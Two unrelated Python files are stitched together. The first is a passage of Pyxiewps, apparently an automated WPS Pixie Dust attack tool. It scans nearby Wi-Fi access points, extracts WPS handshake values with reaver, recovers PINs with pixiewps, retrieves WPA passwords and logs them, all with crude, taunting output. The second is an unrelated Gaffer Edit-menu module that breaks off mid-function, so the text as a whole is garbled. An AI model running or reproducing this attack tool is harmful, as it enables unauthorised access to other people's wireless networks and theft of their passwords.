print INFO + "Good fucking choice..."
print
pass
elif choice in CHOICES_NOPE:
c.set_iface("DOWN")
c.set_iface("UP")
print INFO + "It's on! Bitches..."
while True:
attack = Attack()
attack.get_wps_aps()
if not FOREVER:
engine.exit_clean()
def parse_reaver(self, output, pin_found = False):
"""
Parses the reaver output
Gets the pkr, pke, hash1 y 2, enonce, rnonce, authkey, manufacturer y model
and returns all the data
"""
if pin_found:
password = ''
for line in output:
if '[+] WPA PSK: ' in line:
password = sub('\[\+\] WPA PSK: ','',line)
return password
if password == '':
return 'no password'
E_NONCE = ''
R_NONCE = ''
PKR = ''
PKE = ''
HASH1 = ''
HASH2 = ''
AUTHKEY = ''
MANUFACTURER = ''
MODEL = ''
NUMBER = ''
uberlist = []
final_list = []
is_complete = False
has_something = False
if output == '':
return 'shit'
for line in output:
if 'E-Nonce' in line:
has_something = True
elif 'E-Hash2' in line:
final_list = output[0:output.index(line)+1] # Truncates the output after the hash2 is found
is_complete = True
break
elif 'Detected AP rate limiting' in line:
return 'ap rate limited'
if has_something and not is_complete:
return 'more time please'
elif has_something == False:
return 'noutput'
for line in final_list:
if 'E-Nonce' in line:
E_NONCE = sub('\[P\] E-Nonce: ','',line)
elif 'R-Nonce' in line:
R_NONCE = sub('\[P\] R-Nonce: ','',line)
elif 'PKR' in line:
PKR = sub('\[P\] PKR: ','',line)
elif 'PKE' in line:
PKE = sub('\[P\] PKE: ','',line)
elif 'E-Hash1' in line:
HASH1 = sub('\[P\] E-Hash1: ','',line)
elif 'E-Hash2' in line:
HASH2 = sub('\[P\] E-Hash2: ','',line)
elif 'AuthKey' in line:
AUTHKEY = sub('\[P\] AuthKey: ','',line)
elif 'Manufacturer' in line:
MANUFACTURER = sub('\[P\] WPS Manufacturer: ','',line)
elif 'Model Name' in line:
MODEL = sub('\[P\] WPS Model Name: ','',line)
elif 'Model Number' in line:
NUMBER = sub('\[P\] WPS Model Number: ','',line)
elif '[+] Associated with ' in line:
ESSID = sub('\(ESSID\: ','|',line)
ESSID = ESSID.split('|')[-1][:-2]
elif '[+] Waiting for beacon from ' in line:
BSSID = sub('\[\+\] Waiting for beacon from ','',line)
uberlist = [PKE.strip(),PKR.strip(),HASH1.strip(),HASH2.strip(),AUTHKEY.strip(),
MANUFACTURER.strip(),MODEL.strip(),NUMBER.strip(),E_NONCE.strip(),R_NONCE.strip(),
ESSID.strip(),BSSID.strip()]
return uberlist
def parse_airodump(self, input):
"""
Parses the airodump output
If you find some error in the program flow, check this function first.
Returns ESSID, WPS status, channel, BSSID and RSSI for each AP found.
"""
plist = []
input.reverse() # Important
inds = [47,73,86] # CHANNEL, WPS, ESSID indexes
if CHANNEL != '': inds = [i+4 for i in inds]
for line in input: # Skip all the clients on the output
if 'Probe' in line: #
input = input[(input.index(line)+1):] # Uses the 'Probe' keyword
break #
for i in input:
if "][ Elapsed:" not in i and ":" in i and "<length:" not in i:
i = i.lstrip().strip()
snowden = i[inds[1]:] # I ran out of names
try:
wps = snowden[0:snowden.index(' ')].strip()
essid = snowden[(snowden.index(' ')+2):].lstrip()
except (IndexError, ValueError): # hence ' '
continue
channel = i[inds[0]:inds[0]+2].lstrip()
bssid = i[0:17]
rssi = i[19:22]
try:
if bssid not in blacklist and wps != '' and '0.0' not in wps and int(rssi) >= RSSI:
a = '%s|%s|%s|%s|%s|%s' %(bssid,channel.zfill(2),rssi,wps,wps,essid)
plist.append(a)
except ValueError:
print ALERT + "There was a parsing error in parse_airodump function."
except:
return plist
elif "][ Elapsed:" in i:
break
plist.sort(key=lambda x: int(x[21:24]), reverse = True) # Sorts the list by RSSI
if MAX_APS != 'All':
try:
return plist[0:MAX_APS]
except IndexError:
return plist
if MAX_APS == 'All': # For the sake of readability
return plist
def check(self, check_again = False):
"""
Check dependencies, user ID and other stuff
"""
if c.get_uid() != '0':
print ALERT + 'ROOT motherfucker! Do you speak it?'
exit()
size = c.screen_size()
if size < 110:
print
print ALERT + "What is this? A terminal for ants?"
print " Please, increase the window size and run the program again."
print
exit()
### Programs
if c.program_exists(REAVER):
version = c.check_reaver_version()
if version == '1.5.2':
self.REAVER = True
else:
print ALERT + "You need other version of reaver."
self.REAVER = False
elif not check_again:
print ALERT + 'reaver is not in da house.'
self.REAVER = False
if c.program_exists(PIXIEWPS):
self.PIXIEWPS = True
elif not check_again:
print ALERT + 'pixiewps is not in da fucking house'
self.PIXIEWPS = False
if c.program_exists(AIRMON):
self.AIRMON = True
elif not check_again:
print ALERT + 'airmon-ng is not in da motherfuckin house'
self.AIRMON = False
if c.program_exists(GIT):
self.GIT = True
elif not check_again:
self.GIT = False
if self.REAVER and self.AIRMON and self.PIXIEWPS and check_again:
print INFO + "All programs are now in da house."
raw_input("%sPress enter to continue" %INPUT)
print
print INFO + "Starting the attack..."
elif check_again:
print
print ALERT + "SAaw... shit. Some programs were not installed."
print " manually check the needed dependencies"
print " and run again after you installed them."
print
exit()
if not (self.REAVER and self.AIRMON and self.PIXIEWPS):
print ALERT + "You need to install some programs."
print INPUT + "The dependencies are:"
print "\tbuild-essential"
print "\tlibpcap-dev"
print "\tsqlite3"
print "\tlibsqlite3-dev"
print "\taircrack-ng"
print "\tlibssl-dev"
choice = raw_input("%sDo you wish to install them now? I dare you... I double dare you... [Y/n]" %INPUT)
if choice in CHOICES_YES:
c.get_binaries()
else:
exit()
version = subprocess.Popen('airodump-ng --help | grep wps', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
version1 = version.communicate()[0]
if '--wps' not in version1:
print
print ALERT + "Incorrect version of Aircrack on your repositories."
print " Do you want to download source code and compile it?"
print " (The program will try to compile it but the process may take a while)"
print
choice = raw_input(INPUT+"[Y/n] ")
if choice in CHOICES_YES:
c.get_binaries(compileAircrack = True)
else:
self.exit_clean()
###All good...
engine.start()
def run(self, cmd, shell = False, kill_tree = True, timeout = -1, airodump = False):
"""
Runs a command with a given timeout after which it is terminated.
Returns the stdout of the process.
The output is a list of lines; strip() is not applied to them.
"""
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
output = []
if timeout != -1:
signal(SIGALRM, alarm_handler) # Time's ticking...
alarm(timeout)
if airodump:
proc = subprocess.Popen(cmd, shell = shell, stderr = subprocess.PIPE)
else:
proc = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE)
try:
if airodump:
for line in iter(proc.stderr.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
else:
for line in iter(proc.stdout.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
except Alarm: # time's out! alarm is raised
pids = [proc.pid] # kill the process tree related with the main process.
if airodump: system('pkill airodump')
if kill_tree:
pids.extend(self.get_process_children(proc.pid))
for pid in pids:
try:
kill(pid, SIGKILL)
except OSError:
pass
return output
return output
def get_process_children(self, pid):
"""
Returns the child pids of the given process so that the whole process tree can be killed.
"""
proc = subprocess.Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True, stdout = subprocess.PIPE)
stdout = proc.communicate()[0]
return [int(p) for p in stdout.split()]
def exit_clean(self):
"""
Clean up before quitting.
"""
if path.isfile('/root/pixiewps/Makefile') or path.isfile('/root/reaver-wps-fork-t6x/src/Makefile'):
print OPTION + "The pixiewps and reaver files are no longer needed"
print " and they live in the root home directory,"
choice = raw_input("%sDo you wish to erase them? [Y/n]" %INPUT)
if choice in CHOICES_YES:
system('cd /root && rm -r pixiewps/ && rm -r reaver-wps-fork-t6x/')
if c.IS_MON:
c.set_iface("DOWN")
system('pkill airodump')
system('rm -f /usr/local/etc/reaver/*.wpc')
exit()
class Config():
"""
Configuration functions
"""
IFACE_MON = 'caca' # means 'shit' in spanish
IFACE = 'caca'
IS_MON = False
def screen_size(self):
"""
Returns the window size
"""
return int(subprocess.check_output(['stty','size']).split()[1])
def program_exists(self, program):
"""
Checks whether the given program exists.
"""
cmd = "which " + program
output = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE)
output = output.communicate()[0]
if output != "":
return True # Exists
else:
return False # Nope
def get_uid(self):
"""
Returns the user ID
"""
uid = subprocess.check_output(['id','-u']).strip()
return uid
def internet_on(self):
"""
Checks the Internet connection.
"""
try:
stri = "https://duckduckgo.com" # Checks connection with duckduckgo
data = urllib.urlopen(stri)
return True
except:
return False
def check_iface(self):
"""
Checks for any monitor interfaces already set.
"""
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
mon = ''
for linea in proc:
if 'Monitor' in linea:
mon = linea[0:10].strip()
if mon != '':
self.IFACE_MON, self.IFACE = mon,mon
self.IS_MON = True
return True
else:
return False
def get_iface(self):
"""
Returns the wireless interface to use.
If more than one is found, asks the user to choose.
If monitor mode is already enabled, returns that interface's name.
"""
if self.IS_MON: # If the interface is already in monitor mode, it returns its name
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
for linea in proc:
if 'Monitor' in linea:
mon = linea[0:10].strip()
self.IFACE_MON = mon
return mon
else:
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
ifaces = []
for linea in proc:
if 'IEEE' in linea:
ifaces.append(linea[0:10].strip())
if len(ifaces) == 1 and ifaces[0] == '':
print ALERT + "Are... you... f*ing.. kidding me?"
print " Please check if any wireless device in your PC."
print " if you are running on a virtual machine"
print " go get an USB wireless device."
print " Go get a WiFi for dummies also."
exit()
elif len(ifaces) > 1:
print INPUT + "Pick it... "
for i in ifaces:
print str(ifaces.index(i)) + " >> " + i
while True: # Control the input! you bugseeker!
try:
choice = int(raw_input(INPUT))
self.IFACE = ifaces[choice]
return ifaces[choice]
except (IndexError, ValueError):
print ALERT + "Number between 0 and %s" %(len(ifaces)-1) #Index error handling
except KeyboardInterrupt:
print
print ALERT + "Interrupted program!"
print
engine.exit_clean()
else:
self.IFACE = ifaces[0]
return ifaces[0]
def set_iface(self, status):
"""
Puts the wireless interface into monitor mode
or restores it back to managed mode.
The "status" argument is used only for the sake of readability; the behaviour
is driven by the "self.IS_MON" boolean.
"""
if self.IS_MON:
print INFO + 'Restoring %s wireless interface...' %self.get_iface()
system('ifconfig %s down' %(self.IFACE_MON))
system('iwconfig %s mode Managed' %(self.IFACE_MON))
system('ifconfig %s up' %(self.IFACE_MON))
self.IS_MON = False
print INFO + 'Done'
else:
print INFO + 'Enabling NSA mode on %s...' %(self.get_iface())
system('ifconfig %s down' %(self.IFACE))
system('iwconfig %s mode monitor' %(self.IFACE))
system('ifconfig %s up' %(self.IFACE))
self.IFACE_MON = self.IFACE
self.IS_MON = True
print INFO + "NSA mode enabled on %s" %self.IFACE
print
def data_file(self, data):
"""
Saves the data into a file
"""
system('echo INFORMATION >> %s' %OUTPUT_FILE)
with open(OUTPUT_FILE, 'a+') as f:
date = str(datetime.datetime.now())
f.write(date+'\n')
f.writelines(data)
print INFO + "All data were saved into %s. NSA does the same thing with your mails." %OUTPUT_FILE
def get_binaries(self, compileAircrack = False):
"""
Installs reaver, pixiewps and other stuff
"""
if not self.internet_on():
print
print ALERT + "How am I supposed to download something"
print " when you are not connected to the internet?"
print " Please check your connection so that Pyxiewps"
print " can install all the required programs."
print
engine.exit_clean()
if compileAircrack:
system('mkdir pyxietmp')
chdir('pyxietmp')
print INFO + "Downloading source code..."
system('wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz') # Get source code
print INFO + "Decompressing..."
system('tar -xf aircrack-ng-1.2-rc2.tar.gz') # Decompress
chdir('aircrack-ng-1.2-rc2')
print INFO + "Installing dependencies..."
system('apt-get -y install pkg-config libnl-3-dev libnl-genl-3-dev') # Dependencies
print INFO + "Compiling..."
system('make && make strip && make install') # Compile
print INFO + "Cleaning files..."
chdir('../../')
system('rm -r pyxietmp') # Clean
print INFO + "Done!"
engine.check(check_again = True) # Check
git = 'apt-get -y install git'
reaver_dep = 'apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng'
pixie_dep = 'sudo apt-get -y install libssl-dev'
reaver_apt = 'apt-get -y install reaver'
reaver = 'git clone https://github.com/t6x/reaver-wps-fork-t6x.git'
pixiewps = 'git clone https://github.com/wiire/pixiewps.git'
aircrack = 'apt-get -y install aircrack-ng'
if not engine.GIT:
print INFO + "Installing git..."
proc4 = system(git)
if not engine.AIRMON:
print INFO + "Installing aircrack..."
proc5 = system(aircrack)
if not engine.PIXIEWPS:
print INFO + "Installing pixiewps dependencies..."
proc2 = system(pixie_dep)
print INFO + "Downloading pixiewps..."
proc3 = system(pixiewps)
if not engine.REAVER:
print INFO + "Installing reaver dependencies..."
proc = system(reaver_dep)
print INFO + "Downloading reaver..."
if 'kali' in subprocess.check_output('uname -a', shell = True):
proc1 = system(reaver_apt)
else:
proc1 = system(reaver)
if path.isdir('pixiewps') and not engine.PIXIEWPS:
print INFO + "Installing pixiewps..."
system('cd pixiewps/src && make && make install')
print INFO + "Done"
if path.isdir('reaver-wps-fork-t6x') and not engine.REAVER:
print INFO + "Installing reaver..."
system('cd reaver-wps-fork-t6x* && cd src && ./configure && make && make install')
print INFO + "Done"
engine.check(check_again = True)
def check_reaver_version(self):
"""
Returns reaver version if it's installed
"""
output = subprocess.Popen('reaver -h', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
output = output.communicate()
if 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[0] and 'mod by t6_x' in output[0]:
return '1.5.2'
elif output[0] != '':
return output[0][9:12]
elif 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[1] and 'mod by t6_x' in output[1]:
return '1.5.2'
elif output[1] != '':
return output[1][9:12]
class Attack():
"""
Attack functions
"""
def get_wps_aps(self):
"""
Enumerates any WPS-active APs
Goes to get_reaver_info
"""
print INFO + "WPS-active APs?! Hello? Anyone there?..."
cmd = 'airodump-ng -c 1-11 --wps %s' %(c.IFACE_MON)
if CHANNEL != '':
cmd = 'airodump-ng -c %d --wps %s' %(CHANNEL, c.IFACE_MON)
output = engine.run(cmd, shell = True, timeout = AIRODUMP_TIME, airodump = True)
ap_list = engine.parse_airodump(output)
last = len(ap_list)-1
if ap_list == []:
print
print ALERT + "Nooooooope!"
print
if not FOREVER:
engine.exit_clean()
else:
for_fill = ap_list #\
essids = [] #|
for line in for_fill: #|- Formats the list
line = line.split('|') #|
essids.append(line[5]) #|
fill = len(max(essids, key=len)) #/
print INFO + "Oh! Here they are:"
for line in ap_list:
line = line.split('|')
fill_line = fill - len(line[5])
print '\t' + INPUT + str(line[5]) + ' '*fill_line + ' || ' + line[0] + ' || Channel: ' + line[1] + ' || RSSI: ' + line[2] + ' || WPS: ' + line[4]
while True:
try:
if len(ap_list) != 1 and PROMPT_APS:
choice = raw_input("%sIndex of the AP or press ENTER to shotgun the shit out all of them: " %INPUT)
if choice == '':
break
else:
choice = int(choice)
temp = []
temp.append(ap_list[choice])
ap_list = temp
break
else:
break
except KeyboardInterrupt:
print
engine.exit_clean()
break
except (ValueError, IndexError):
print ALERT + "Number between 0 and %d" %last
if path.isfile('pyxiewpsdata.txt'):
match = []
wpspin = []
with open('pyxiewpsdata.txt') as f:
already_found_pins = f.readlines()
if len(already_found_pins) > 1:
already_found_pins.reverse() # reverses the list so the newest pin is taken first
for target in ap_list: # in case a pin was changed by the AP administrator
for line in already_found_pins[1:]:
if target.split('|')[5] == line.strip():
match.append(target)
wpspin.append(already_found_pins[already_found_pins.index(line)-1].strip())
for i in set(match):
print OPTION + "Dude... you already got thisone: %s" %i.split('|')[5]
print '\t'+ INPUT + wpspin[match.index(i)]
if not OVERRIDE:
print INFO + "Will attack again as requested."
print
else:
print INFO + "Skiped forevaah."
ap_list.remove(i) # Removed from the AP list
blacklist.append(i[:17])
print
for line in ap_list: # main for-loop
line = line.split('|')
self.get_reaver_info(line[0],line[1],line[5])
print SEPARATOR
if not FOREVER:
engine.exit_clean()
def get_reaver_info(self, bssid, channel, essid):
"""
Gets all the vital information from the AP
PKR, PKE, HASH1, HASH2, AUTHKEY
it's in the get_wps_aps for-loop
"""
print INFO + "Fetching information from %s using reaver..." %essid
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',bssid,'-vvv','-P','-l', '1','-c',channel], timeout = REAVER_TIME)
data = engine.parse_reaver(output)
if data == 'noutput':
print
print ALERT + "WOW. SUCH SECURITY. NO DATA. WOW."
print ALERT + "Try with a greater time using the -t argument"
print " and if it doesn\'t work out try to get a better signal."
print " And if even that doesn't works out..... try get a life."
print
elif data == 'more time please':
print
print ALERT + "The program retrieved some information from the AP but"
print " not all of it. Set a greater time to fetch the information"
print " with the -t argument. 6 seconds by default"
print
elif data == 'ap rate limited':
print
print ALERT + "The AP says: FUCK YOU!"
print " That\'s why reaver couldn\'t retrieve any information."
if BLACKLIST:
blacklist.append(bssid)
print INFO + "and %s won\'t be attacked again." %essid
else:
print INFO + "but %s will be attacked again as requested. You persistent fuck." %essid
print
elif data == 'cacota':
print
print "Choose a reaver session option when asked for it."
if not FOREVER:
engine.exit_clean()
else:
print INFO + "Success bitches! All the needed information were found"
for_file = ['ESSID: ' + data[10] + '\n','MAC: ' + data[11] + '\n','PKE: ' + data[0] + '\n',
'PKR: ' + data[1] + '\n','HASH1: ' + data[2] + '\n','HASH2: ' + data[3] + '\n',
'E-NONCE: ' + data[8] + '\n','R-NONCE: ' + data[9] + '\n','AUTHKEY: ' + data[4] + '\n',
'MANUFACTURER: ' + data[5] + '\n','MODEL: ' + data[6] + '\n','MODEL NUMBER: ' + data[7] + '\n']
if PRINT_REAVER:
print
for line in for_file:
print DATA + line.strip()
print
if OUTPUT and not USE_PIXIEWPS:
for_file.append('-'*40+'\n')
c.data_file(for_file)
if USE_PIXIEWPS:
self.pixie_attack(data,for_file,channel)
def pixie_attack(self,data,for_file,channel):
"""
Tries to find the WPS pin using pixiewps
"""
ESSID = data[10]
BSSID = data[11]
PKE = data[0]
PKR = data[1]
HASH1 = data[2]
HASH2 = data[3]
AUTHKEY = data[4]
E_NONCE = data[8]
R_NONCE = data[9]
cmd = ['pixiewps','-e',PKE,'-r',PKR,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE]
cmd1 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE,'-S']
cmd2 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-n',E_NONCE,'-m',R_NONCE,'-b',BSSID,'-S']
pin = ''
cmd_list = [cmd, cmd1, cmd2]
output = []
for command in cmd_list:
try:
output = engine.run(command, timeout = 2)
output = [i.strip() for i in output]
for line in output:
if '[+] WPS pin:' in line:
result = compile('\d+')
pin = result.search(line).group(0)
break
except: #Pixiewps error handling
pass
if pin != '': break
if pin != '' and len(pin) == 8:
print INFO + "Dada dada dada Afro circus Afro circus Afro pocka dot pocka dot Afro! (Success dance)"
print "\t" + INPUT + pin
for_file.append('Pin WPS: '+pin+'\n')
system('echo >> pyxiewpsdata.txt')
with open('pyxiewpsdata.txt','a+') as f:
f.write(ESSID+'\n')
f.write(pin)
elif pin == '':
print
print ALERT + "WPS pin was not found."
print " Probably, the AP is not vulnerable to this attack"
print " and never will. Move on."
print
blacklist.append(BSSID) # AP is blacklisted
if GET_PASSWORD and pin != '':
self.get_password(for_file, BSSID, pin, channel)
elif OUTPUT:
for_file.append('-'*40+'\n')
c.data_file(for_file)
def get_password(self, for_file, BSSID, pin, channel):
"""
Once the WPS pin was found, tries to get the password.
"""
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',BSSID,'-c',channel,'-p',pin,'-L'], timeout = (REAVER_TIME))
password = engine.parse_reaver(output, pin_found = True)
if password == 'no password':
print
print ALERT + "Can't get the password right now because shit happens"
print " but you can use the WPS pin to access the wireless network."
print
else:
print INFO + "Dada dada dada Afro circus Afro circus Afro pocka dot pocka dot Afro! (Again)"
print '\t' + INPUT + password.strip()
print
if OUTPUT:
for_file.append('Password: ' + password + '\n'+'-'*40+'\n')
c.data_file(for_file)
if __name__ == '__main__':
banner()
arg_parser()
try:
c = Config()
engine = Engine()
engine.check()
except (KeyboardInterrupt, EOFError):
print
print ALERT + "Interrupted program!"
print
engine.exit_clean()
|
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
def appendDefinitions( menuDefinition, prefix="" ) :
menuDefinition.append( prefix + "/Undo", { "command" : undo, "shortCut" : "Ctrl+Z", "active" : __undoAvailable } )
menuDefinition.append( prefix + "/Redo", { "command" : redo, "shortCut" : "Shift+Ctrl+Z", "active" : __redoAvailable } )
menuDefinition.append( prefix + "/UndoDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Cut", { "command" : cut, "shortCut" : "Ctrl+X", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Copy", { "command" : copy, "shortCut" : "Ctrl+C", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Paste", { "command" : paste, "shortCut" : "Ctrl+V", "active" : __pasteAvailable } )
menuDefinition.append( prefix + "/Delete", { "command" : delete, "shortCut" : "Backspace, Delete", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/CutCopyPasteDeleteDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Find...", { "command" : find, "shortCut" : "Ctrl+F" } )
menuDefinition.append( prefix + "/FindDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Arrange", { "command" : arrange, "shortCut" : "Ctrl+L" } )
menuDefinition.append( prefix + "/ArrangeDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Select All", { "command" : selectAll, "shortCut" : "Ctrl+A" } )
menuDefinition.append( prefix + "/Select None", { "command" : selectNone, "shortCut" : "Shift+Ctrl+A", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Inputs", { "command" : selectInputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Add Inputs", { "command" : selectAddInputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/InputsDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Select Connected/Outputs", { "command" : selectOutputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Add Outputs", { "command" : selectAddOutputs, "active" : __selectionAvailable } )
## A function suitable as the command for an Edit/Undo menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def undo( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.undo()
## A function suitable as the command for an Edit/Redo menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def redo( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.redo()
## A function suitable as the command for an Edit/Cut menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def cut( menu ) :
script, parent = __scriptAndParent( menu )
with Gaffer.UndoContext( script ) :
script.cut( parent, script.selection() )
## A function suitable as the command for an Edit/Copy menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def copy( menu ) :
script, parent = __scriptAndParent( menu )
script.copy( parent, script.selection() )
## A function suitable as the command for an Edit/Paste menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def paste( menu ) :
script, parent = __scriptAndParent( menu )
originalSelection = Gaffer.StandardSet( iter( script.selection() ) )
with Gaffer.UndoContext( script ) :
script.paste( parent )
# try to get the new nodes connected to the original selection
nodeGraph = __nodeGraph( menu, focussedOnly=False )
if nodeGraph is None :
return
nodeGraph.graphGadget().getLayout().connectNodes( nodeGraph.graphGadget(), script.selection(), originalSelection )
# position the new nodes sensibly
bound = nodeGraph.bound()
mousePosition = GafferUI.Widget.mousePosition()
if bound.intersects( mousePosition ) :
fallbackPosition = mousePosition - bound.min
else :
fallbackPosition = bound.center() - bound.min
fallbackPosition = nodeGraph.graphGadgetWidget().getViewportGadget().rasterToGadgetSpace(
IECore.V2f( fallbackPosition.x, fallbackPosition.y ),
gadget = nodeGraph.graphGadget()
).p0
fallbackPosition = IECore.V2f( fallbackPosition.x, fallbackPosition.y )
nodeGraph.graphGadget().getLayout().positionNodes( nodeGraph.graphGadget(), script.selection(), fallbackPosition )
nodeGraph.frame( script.selection(), extend = True )
## A function suitable as the command for an Edit/Delete menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def delete( menu ) :
script, parent = __scriptAndParent( menu )
with Gaffer.UndoContext( script ) :
script.deleteNodes( parent, script.selection() )
## A function suitable as the command for an Edit/Find menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def find( menu ) :
script, parent = __scriptAndParent( menu )
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
try :
findDialogue = scriptWindow.__findDialogue
except AttributeError :
findDialogue = GafferUI.NodeFinderDialogue( parent )
scriptWindow.addChildWindow( findDialogue )
scriptWindow.__findDialogue = findDialogue
findDialogue.setScope( parent )
findDialogue.setVisible( True )
## A function suitable as the command for an Edit/Arrange menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def arrange( menu ) :
script, parent = __scriptAndParent( menu )
nodeGraph = __nodeGraph( menu, focussedOnly=False )
if not nodeGraph :
return
graph = nodeGraph.graphGadget()
nodes = script.selection()
if not nodes :
nodes = Gaffer.StandardSet( graph.getRoot().children( Gaffer.Node ) )
with Gaffer.UndoContext( script ) :
graph.getLayout().layoutNodes( graph, nodes )
## A function suitable as the command for an Edit/Select All menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAll( menu ) :
script, parent = __scriptAndParent( menu )
for c in parent.children( Gaffer.Node ) :
script.selection().add( c )
## A function suitable as the command for an Edit/Select None menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectNone( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.selection().clear()
## The command function for the default "Edit/Select Connected/Inputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectInputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
inputs = Gaffer.StandardSet()
for node in script.selection() :
__inputNodes( node, inputs )
selection = script.selection()
selection.clear()
for node in inputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Add Inputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAddInputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
inputs = Gaffer.StandardSet()
for node in script.selection() :
__inputNodes( node, inputs )
selection = script.selection()
for node in inputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Outputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectOutputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
outputs = Gaffer.StandardSet()
for node in script.selection() :
__outputNodes( node, outputs )
selection = script.selection()
selection.clear()
for node in outputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Add Outputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAddOutputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
outputs = Gaffer.StandardSet()
for node in script.selection() :
__outputNodes( node, outputs )
selection = script.selection()
for node in outputs :
selection.add( node )
def __selectionAvailable( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
return True if scriptWindow.scriptNode().selection().size() else False
def __pasteAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
root = scriptNode.ancestor( Gaffer.ApplicationRoot )
return isinstance( root.getClipboardContents(), IECore.StringData )
def __nodeGraph( menu, focussedOnly=True ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
nodeGraph = None
## \todo Does this belong as a Window.focussedChild() method?
focusWidget = GafferUI.Widget._owner( scriptWindow._qtWidget().focusWidget() )
if focusWidget is not None :
nodeGraph = focusWidget.ancestor( GafferUI.NodeGraph )
